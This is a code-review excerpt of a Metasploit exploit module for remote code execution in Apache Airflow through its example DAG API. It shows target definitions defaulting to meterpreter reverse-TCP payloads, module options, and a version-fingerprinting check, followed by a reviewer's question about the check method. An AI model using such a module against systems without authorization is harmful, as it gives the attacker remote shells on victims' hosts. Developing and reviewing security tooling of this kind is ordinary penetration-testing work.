modules/exploits/multi/http/apache_airflow_dag_rce.rb

```diff
@@ -0,0 +1,265 @@
+          [ 'URL', 'https://lists.apache.org/thread/mq1bpqf3ztg1nhyc5qbrjobfrzttwx1d' ],
+        ],
+        'Platform' => ['linux', 'unix', 'win'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/python/meterpreter_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows PowerShell Command',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2020-07-14',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(8080, true, 'Apache Airflow webserver default port'),
+        OptString.new('TARGETURI', [ true, 'Base path', '/' ]),
+        OptString.new('DAG_PATH', [
+          true,
+          'Path to vulnerable example DAG',
+          '/api/experimental/dags/example_trigger_target_dag'
+        ]),
+        OptInt.new('TIMEOUT', [true, 'How long to wait for payload execution (seconds)', 120])
+      ]
+    )
+  end
+
+  def check
+    uri = normalize_uri(target_uri.path, 'admin', 'airflow', 'login')
+    print_status("Checking target web server for a response at: #{full_uri(uri)}")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => uri
+    })
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check request.')
+    end
+
+    unless res.code == 200 &&
+           res.body.downcase.include?('admin') &&
+           res.body.downcase.include?('_csrf_token') &&
+           res.body.downcase.include?('sign in to airflow')
+      return CheckCode::Unknown('Target is not running Apache Airflow.')
+    end
+
+    print_good('Target is running Apache Airflow.')
+
+    print_status('Checking Apache Airflow version...')
+    version_number = res.body.to_s.scan(
+      %r{<a href="https://airflow[.]apache[.]org/docs/([\d.]+)"}
+    ).flatten.first
+
+    unless version_number
+      return CheckCode::Detected('Apache Airflow version cannot be determined.')
+    end
+
+    print_good("Target is running Apache Airflow Version #{version_number}.")
+
+    if Rex::Version.new(version_number) < Rex::Version.new('1.10.11')
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def check_api
```

Comment:
Again, minor, but is there a reason this s not included in the main `check` method?  Am I missing us setting something required to execute?